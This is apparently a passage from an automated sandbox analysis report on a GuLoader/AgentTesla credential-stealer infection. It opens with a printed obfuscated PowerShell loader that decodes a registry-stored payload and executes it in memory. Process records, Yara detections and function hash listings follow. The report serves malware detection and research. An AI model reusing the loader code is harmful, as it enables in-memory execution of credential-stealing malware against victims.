WiCMoeAcnGe)Fu;St[EnDFolNdlfrIramZopSkoPlrNitRe(Fu`"""SjkDyeTrrAnnOpePulAc3Un2su`"""Da)Am]RapopuTobFolDaiDrcAu AbsSptBiaCetFuiEncPa PseClxFetSeeMirSynTo GlISunCrtSpPdetPerUn PaESenFauDomAfSUnybasAdtbreUdmDiLStoFacReaGalTreSwsAmWKr(ScuKaiAdnLitUn StvKa1Al,DeiFrnsytTr OovGo2pl)re;ca}bl'Sa;An`$seSretLauKreMeoGarOpgbolKoeKorHusDr3Al=Sr[TrSRetDiuAneRooGrrSkgFolHeePorApsHa1Bl]In:Fl:MoVSniSarSetCaunoaSalAkATrlAvlKjoMucPe(Ne0no,Sc1Li0Bo4Co8Sp5ab7Th6Tr,Ko1Ud2Ka2Ag8Se8ba,Ch6Zo4Ja)Fo;Dr`$AfmKauGitJeaRitPaiMaoFanBniofsPetPa=Va(SeGPeemotAu-TiILhtSheFemOvPRerHjoStpFleFerHatUnyfe Pl-GuPOuaTjtAphMa Su'ErHUnKSuCMeUCh:Rn\SpNSueStcChrchoInlPeoTeggsiDecSnaAplWi\NaIDagAsnAdoForAreprrOviPenClgDieBerFasUm'Up)An.paSAckChiKlfSernyePrtSt;Pr`$EckUlrTaaUnkUnnRoiBonSggAweSurSmsAf Gl=Pi Rh[OkSAsyFoshytUneChmKo.ToCChoDanAnvMeebarHytVe]Ch:Th:BeFAfrCloMimDeBEnaUdsCieCo6Fo4OtSDitSerSuiAunSugMi(Fa`$EfmSouOvtUdaFitDeiReoMenRiiDosLotor)Re;Sp[FlSGuyUdstatFoeStmMe.WiRSkuDinUntAliMamTieUn.CiIUdnMetskeOvrKooSnpFiSDyeDirCrvMaiFrcFoeInsAl.SyMBeaTeransWrhkoaDelWi]Un:De:SkCAroStpSpyUn(Dr`$UlkCorToaOukFanHeiNonBlgCheSerFasLi,Mi Fl0He,Pa En Pu`$PoSPatDeuKaeBioPurVrgRulSkeOvrIwsIn3ie,To Sk`$MlkRerStaMekFrnRoiConAngSteOprOvsSa.SncCaodeuRanKrtPr)Un;Is[NeSMetebuBeePeoUnrSagOllUdeInrSasSo1Pr]Pe:Pa:SiEKanpiuUkmOpSTyySvsBrtcoeKrmHaLWeoAicLaaKrlWieMiswoWLn(Ba`$SpSDetSpuMaePaoNurUtgInlSaehyrEnsHj3Sc,Bi Kn0Me)Fo#Sk;""";Function Stueorglers4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $discontentment = $discontentment + $HS.Substring($i, 1); } $discontentment;}$Sudser0 = Stueorglers4 'riISyEScXFr ';$Sudser1= Stueorglers4 $Skoleeksempel;&$Sudser0 $Sudser1;;
Imagebase:	0xe60000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	14:50:18
Start date:	28/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	13
Start time:	14:51:20
Start date:	28/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
Imagebase:	0x890000
File size:	2170976 bytes
MD5 hash:	350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Target ID:	14
Start time:	14:51:21
Start date:	28/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP"
Imagebase:	0xbd0000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	17
Start time:	14:52:17
Start date:	28/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Imagebase:	0xb40000
File size:	106496 bytes
MD5 hash:	827875A7EE6003FC7F5301C613A2BB1C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000011.00000000.507338046.0000000000F20000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Function 007A16F8 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eea5a03557c23dcbd071e6a8f5088959b6d7e3c05e7846db6135ec0fd5080ff
Instruction ID: 36d2fc75d0e080257d6ec7ba6e6276ceff809cb15f78e28bbdcd56b55cae7215
Opcode Fuzzy Hash: 0eea5a03557c23dcbd071e6a8f5088959b6d7e3c05e7846db6135ec0fd5080ff
Instruction Fuzzy Hash: 38F19175B002189FDB14DFA8D480AAEBBF2EF89314F65C169E905AB351DB35EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 007AA378 Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 460dcb77226a3b186221ed542a19c10788821ebfc583e4cb3ba2a74e8e79eabd
Instruction ID: ab8fa9753e85fa717d9305db03c3672b398cac5f83b27fad96d9f43308ad130d
Opcode Fuzzy Hash: 460dcb77226a3b186221ed542a19c10788821ebfc583e4cb3ba2a74e8e79eabd
Instruction Fuzzy Hash: F7D11B34A00218DFDB24CF64C954B9DBBB2FF89314F1482A9E509AB392DB749D86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 007A0DD0 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee4c6cc7e827e473573ab833280ea26137afc127b035bc6af22d73236ff0bfec
Instruction ID: 922259d36480a4a2a640b3ed5073d15bef7cc857e4a9930e39e58e4346cdd0b6
Opcode Fuzzy Hash: ee4c6cc7e827e473573ab833280ea26137afc127b035bc6af22d73236ff0bfec
Instruction Fuzzy Hash: 3CA18E75B042088FDB14DF68C994AAEB7F6EFC9300F158568E506AB395DB35EC41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007A1190 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eff7db3879e1cf3a6699b46612d155c3e140cc7177d5981623c41ab555592f1b
Instruction ID: 6d7cf20029184c76ccb740364414f0d1769c89cf96f8ae36e56fb9aa84672ab3
Opcode Fuzzy Hash: eff7db3879e1cf3a6699b46612d155c3e140cc7177d5981623c41ab555592f1b
Instruction Fuzzy Hash: 1881E47190E3909FCB03DB68D8A08DA7FB1AF47214B1A45D7D190DB2A3C728DD45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 007A6EC8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b01a67b864ec4c7970ffde8056fa4d020bd2e82c3c4568e3e07550f44c4bf0bc
Instruction ID: 54c725daaea824197e9468a5d90ff16a1ba1cf96c93fa8a129446dbc52bdef2a
Opcode Fuzzy Hash: b01a67b864ec4c7970ffde8056fa4d020bd2e82c3c4568e3e07550f44c4bf0bc
Instruction Fuzzy Hash: 82911B75A042099FCB08DFA9D884AAEBBF2FF89310F14C569E505AB351DB35AD41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007A72E8 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b22be870a1f2591d0900cdd4cb9c89db080aa1142210da7dd98c211e1983c9e5
Instruction ID: 7874694fcb04bac7cdd0c2c3f7a825a97f7d9bbca7c32a2974f9fe892cf287da
Opcode Fuzzy Hash: b22be870a1f2591d0900cdd4cb9c89db080aa1142210da7dd98c211e1983c9e5
Instruction Fuzzy Hash: EB719035B042089BDB18DFA9E8546AEBBB6FFC9311F10812AE505E7390DF759D01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 007A1180 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6517c911d963ba83cafb24f869071aa740e58529bb864dab63bc07b04c0470d0
Instruction ID: b44a5e526de21df18ef21a698b7b75584dde1e81aae8db796221a175a0a8c630
Opcode Fuzzy Hash: 6517c911d963ba83cafb24f869071aa740e58529bb864dab63bc07b04c0470d0
Instruction Fuzzy Hash: F7714A75A001089FDB14CFA8C985AAEB7F2FF89310F658668E515EB390D735EC52CB90

Uniqueness

Uniqueness Score: -1.00%

Function 007AA368 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa4fdbf697cb80baf4394da72420380f0d7aea22d29a27f0ff7228489e04f5cb
Instruction ID: 4a6b1c3adf612697bf20b7c9011f191d68d708b2c0b88794c67554cbb472b2e5
Opcode Fuzzy Hash: aa4fdbf697cb80baf4394da72420380f0d7aea22d29a27f0ff7228489e04f5cb
Instruction Fuzzy Hash: 0B514834E002599FDB24CF68C944A9DBBF2BF89310F2486A9D449AB351EB349D46CF52

Uniqueness

Uniqueness Score: -1.00%

Function 007A191F Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e5c00a15ddbad4722614876b2ca37fe7d7ff208d94b294986393476f3142517
Instruction ID: c754d1dd0e46c2f0f91bd79d6e9239c74060d904898bfd22590c665f31c48e18
Opcode Fuzzy Hash: 2e5c00a15ddbad4722614876b2ca37fe7d7ff208d94b294986393476f3142517
Instruction Fuzzy Hash: 7B512A74A00109AFDB04CF98C480A9EBBF2FF89314F65C559E805AB365DB75ED92CB90

Uniqueness

Uniqueness Score: -1.00%

Function 007AA8F0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f94a641971a2053623c88a54b93339804b4302e38432636092bea1af99778f0
Instruction ID: b56cad36164aee973ad69feb07c6fd04ed6bdf343c13de89dee6b84adb1370da
Opcode Fuzzy Hash: 8f94a641971a2053623c88a54b93339804b4302e38432636092bea1af99778f0
Instruction Fuzzy Hash: AC419F31A08644AFD715CF6AC804A5ABBF5EFCA720F16C0ABE558CB362DB349C05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 007A71C1 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e1eb28f185c1ced26ccf05e33e1269858f6c5e7bc267133a1fd0bcf410d861c
Instruction ID: b6edade5e28618bb017e2e04f975175b9613c4fd70eb3e56660b5cb83c4d1a09
Opcode Fuzzy Hash: 2e1eb28f185c1ced26ccf05e33e1269858f6c5e7bc267133a1fd0bcf410d861c
Instruction Fuzzy Hash: C541F635A00209EFCB14DF94E884A9EBBF2FF89315F24C529E505AB251DB34AD46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007A01B8 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa7f136fa611868fe12ae8256e74c1a6551972313aff0a3217f540fcdedddc58
Instruction ID: ed07b2480e669a6a1a8621ed4ebe85cd32686a1bb4fe9264c232c25b49fa7afd
Opcode Fuzzy Hash: aa7f136fa611868fe12ae8256e74c1a6551972313aff0a3217f540fcdedddc58
Instruction Fuzzy Hash: B8316175E00709DBDB14DFA5C8447DEBBB2BF89304F10852AE901BB780EB7068458B90

Uniqueness

Uniqueness Score: -1.00%

Function 007A6EBA Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff3599005bc1460bd317c6beb0ddc4ffea21ab27d63df72bd79677b5fb20efa0
Instruction ID: 83e7ac8b66cb1a89e3ac8273b0423f5ed01e3c1463d66703fdfabd657ba6c40a
Opcode Fuzzy Hash: ff3599005bc1460bd317c6beb0ddc4ffea21ab27d63df72bd79677b5fb20efa0
Instruction Fuzzy Hash: BE21F579E002189FDB08DFA9D98499EFBF2FB8C310B258169E805A7311D735AD41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 007A0DC2 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8581a7f7e23c62cec18bef47dc8ea35ca158f8453e1ccbd0a7d306ba47bc1070
Instruction ID: c1fec304a8c846fc6c5df99e2d66536094694c8f110325c9c30c9ec8165ec6b0
Opcode Fuzzy Hash: 8581a7f7e23c62cec18bef47dc8ea35ca158f8453e1ccbd0a7d306ba47bc1070
Instruction Fuzzy Hash: D1216774A04204CFCB14CF49D490EAAFBF1EF88310F158AA9D8199B361C376EC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 007A7EB8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9794424a123378544dff4266004834d8ebb52310244f84c0302cf6dac48427d0
Instruction ID: 937cd3828798fc01e7ed4923015347c15c734ad8eb75a126c3008f5af1a0905b
Opcode Fuzzy Hash: 9794424a123378544dff4266004834d8ebb52310244f84c0302cf6dac48427d0
Instruction Fuzzy Hash: 6F11A1323082109BC718DB69D84066AB3D6EFC5365B45C97DE21DCBB40DB65FD06CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007A02C0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c8388d87bb43779057b77d811a2a908c63d117cc445094bb1709aa88a6c33f4
Instruction ID: b66b5abc4ca233b738ff5cbcd4c6843000a80b0ff754e181da30ea4c3d62e525
Opcode Fuzzy Hash: 7c8388d87bb43779057b77d811a2a908c63d117cc445094bb1709aa88a6c33f4
Instruction Fuzzy Hash: FF11EDB27040686FC704DB58DC54FAF7BAAEF88310F05802AFA19CB390EA758C1187A1

Uniqueness

Uniqueness Score: -1.00%

Function 007A02D0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a24c56c27d67c3ebcc31fb94d626eacb1a18760974259ad0ea5f3da4bc60daf
Instruction ID: 198677f2efae5a03be67a88163b0b153ae6d4fdf29af8eac3582326312e06c6f
Opcode Fuzzy Hash: 1a24c56c27d67c3ebcc31fb94d626eacb1a18760974259ad0ea5f3da4bc60daf
Instruction Fuzzy Hash: 17018C7230005C6FDB049B59DC54FAF7BAEEB88350F14802AFA19CB390DA759D1187A0

Uniqueness

Uniqueness Score: -1.00%

Function 007A1A80 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8020d1be9f5afed34c84869b69f2270461692843f0383900dbbc1179ab7e0f76
Instruction ID: b3a8c5775b0c401ca6407ff044d51dcfa2851cef8a6365c8e80a27e1328d8fe5
Opcode Fuzzy Hash: 8020d1be9f5afed34c84869b69f2270461692843f0383900dbbc1179ab7e0f76
Instruction Fuzzy Hash: B711F635A00209EFDB05CF94D484E9DBBB2BF89324F29C558E404AB361C775E992CB80

Uniqueness

Uniqueness Score: -1.00%

Function 007AA9D9 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d70a4df617add773ae28bed7d264c125abf313c7d3610bececbee4532fb326da
Instruction ID: 6ec66d0dbdbcfb661c3ec7500a9f3c14b3c0649b0d0666c03cdb6dcb4f99f9ca
Opcode Fuzzy Hash: d70a4df617add773ae28bed7d264c125abf313c7d3610bececbee4532fb326da
Instruction Fuzzy Hash: 9FF0627A7045009FD3119B69D844E56BBD5EF8D760B1680A9E609CB762DB30DC05C791

Uniqueness

Uniqueness Score: -1.00%

Function 007A7C60 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd203825e1f0ef9ba545ec65dfe2c692b75c43c239f601259fb64228938e1b30
Instruction ID: 3bbc7edb52f847277cb9124ece3a319791dd328a1633fe7677145c916754d764
Opcode Fuzzy Hash: bd203825e1f0ef9ba545ec65dfe2c692b75c43c239f601259fb64228938e1b30
Instruction Fuzzy Hash: 30016971E0022A9FCB46DFB8D85059EBBF4FB8D200B208569D419E7310D738A902CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 007A7C70 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b335cf5451ced50972261d0e4ef002bbf3810189f60ca1f1e748295e7ab4c4a7
Instruction ID: 8dcf7f2f903aa72f8e24e8a6c53910b8dc963a46e883ec89f63e23c8cf1b6a07
Opcode Fuzzy Hash: b335cf5451ced50972261d0e4ef002bbf3810189f60ca1f1e748295e7ab4c4a7
Instruction Fuzzy Hash: C9F0F471E0062A9F8B45DFB9C84059EBBF5FB8C210B204529D519E7300EB389902CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 007A7E50 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84723209df656800d52bec3aaca14bc4e43cb8c710c50f933c655d0eada45c2e
Instruction ID: f267289f2ea6cb0f5702a6312958e9fc1cd528f217c1824364200e5414ea7b64
Opcode Fuzzy Hash: 84723209df656800d52bec3aaca14bc4e43cb8c710c50f933c655d0eada45c2e
Instruction Fuzzy Hash: C1F0E93520C2545FCB059B29DC9486A7FE8EFCA27030580AAE948CB302EE30DC05C764

Uniqueness

Uniqueness Score: -1.00%

Function 007A7E60 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45eb8b8bfa62a65f12512599076582332de5934b8a472c49e84667783022d330
Instruction ID: 61a6b60fa6ccf9906b4d9979798ef5c0a6a556f8998bfb4c95afbcb67d1deed4
Opcode Fuzzy Hash: 45eb8b8bfa62a65f12512599076582332de5934b8a472c49e84667783022d330
Instruction Fuzzy Hash: 81E065767081149F4B149A59D88486ABBDDEBC9371711812AF909C7301DB30DC0187A4

Uniqueness

Uniqueness Score: -1.00%

Function 007A72D8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68b4e9a61d64267ac50938a8d9d2b9f0be67d20f1a4b35256b8ee46cfa958bd4
Instruction ID: b404c7cd155e36573bbcf0b6dc2bbfe0f6ac48a4b465fad3f025806d0daa5646
Opcode Fuzzy Hash: 68b4e9a61d64267ac50938a8d9d2b9f0be67d20f1a4b35256b8ee46cfa958bd4
Instruction Fuzzy Hash: 5FE0683270C3452BCF05266998105AABFAA9FCB221B16C0ABE841C7343CE718C06DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007A02B6 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2acf4bea590cb366e1ae6f169d4d3897e8477387fdb2843d19bcfc68e594a186
Instruction ID: 5e9f123a32953258e21f1d763a052c5f95b8ba6bca2e844f79b9dd62a9afbb9d
Opcode Fuzzy Hash: 2acf4bea590cb366e1ae6f169d4d3897e8477387fdb2843d19bcfc68e594a186
Instruction Fuzzy Hash: 4AE0467AB40108DFEB00CB84D845BDCBB71FB8D316F100022E605AB2E0C6762866DB50

Uniqueness

Uniqueness Score: -1.00%

Function 007A7B31 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.590321016.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ac52ca7a21a502d4bc6f7d9450ae536896fccd332f76b5bebf42b5268a58e18
Instruction ID: cebff6e77de163e1c0630280b4e525bb91263e26e825d4e8537b065aaf7a9f6c
Opcode Fuzzy Hash: 5ac52ca7a21a502d4bc6f7d9450ae536896fccd332f76b5bebf42b5268a58e18
Instruction Fuzzy Hash: 6DC0023660A3819FD30B9B3488A54147F32AE4724539944EEC1868F2B3C72E9D06D712

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 4844, Parent PID: 5864COMMON

Execution Graph

Execution Coverage:	28.2%
Dynamic/Decrypted Code Coverage:	99.3%
Signature Coverage:	2.3%
Total number of Nodes:	426
Total number of Limit Nodes:	17

Executed Functions

Function 200F7888 Relevance: 39.9, Strings: 31, Instructions: 1181COMMON

Download Yara Rule

Strings

X1Kr, xrefs: 200F7DEC
X1Kr, xrefs: 200F856F
X1Kr, xrefs: 200F8098
X1Kr, xrefs: 200F83C4
:@$r, xrefs: 200F7B3F
:@$r, xrefs: 200F797D
X1Kr, xrefs: 200F876D
X1Kr, xrefs: 200F85CA
X1Kr, xrefs: 200F8024
X1Kr, xrefs: 200F8002
X1Kr, xrefs: 200F810C
X1Kr, xrefs: 200F87AF
X1Kr, xrefs: 200F82DC
X1Kr, xrefs: 200F83AB
X1Kr, xrefs: 200F8076
X1Kr, xrefs: 200F8556
X1Kr, xrefs: 200F84E2
X1Kr, xrefs: 200F7FAB
X1Kr, xrefs: 200F8751
X1Kr, xrefs: 200F7F60
X1Kr, xrefs: 200F85B1
:@$r, xrefs: 200F798C
X1Kr, xrefs: 200F86E6
X1Kr, xrefs: 200F7F3D
X1Kr, xrefs: 200F8369
X1Kr, xrefs: 200F87CB
X1Kr, xrefs: 200F7D2E
X1Kr, xrefs: 200F80EA
X1Kr, xrefs: 200F815E
X1Kr, xrefs: 200F8350
X1Kr, xrefs: 200F7CE4

Memory Dump Source

Source File: 00000011.00000002.785422401.00000000200F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 200F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_200f0000_CasPol.jbxd

Similarity

API ID:
String ID: :@$r$:@$r$:@$r$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr$X1Kr
API String ID: 0-4224308717
Opcode ID: 16469d787dd1498bd1fd3e10299183839603c3cc087b24c40c9a195ec3070cb5
Instruction ID: 63ea26105ca9c91a136d98ff2c92eb4894ea4bea483aa7da8d5d0409a1fc1220
